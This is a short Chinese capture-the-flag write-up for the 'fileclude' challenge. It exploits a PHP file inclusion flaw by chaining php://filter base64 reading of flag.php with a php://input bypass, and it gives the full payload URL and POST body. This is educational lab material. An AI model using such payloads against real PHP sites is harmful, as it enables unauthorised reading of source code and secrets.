fileclude

背景知识

        文件包含漏洞

题目

fileclude_第1张图片

 fileclude_第2张图片

 分析上述代码

file2被放入file_get_contents()函数,且要求返回值为hello ctf

file1是要包含的文件,放在include函数

php://filter伪协议读取源代码

构造payload:

file1=php://filter/read=convert.base64-encode/resource=flag.php

这里出现了file_get_contents()函数,用php://input绕过,即

 file2=php://input 

所以最终的payload为

/?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=php://input

且post传入 hello ctf

可以用hackbar或者bp 

fileclude_第3张图片fileclude_第4张图片

得到base64编码

解码可得flag

fileclude_第5张图片

 

 

 

你可能感兴趣的:(攻防世界,网络安全)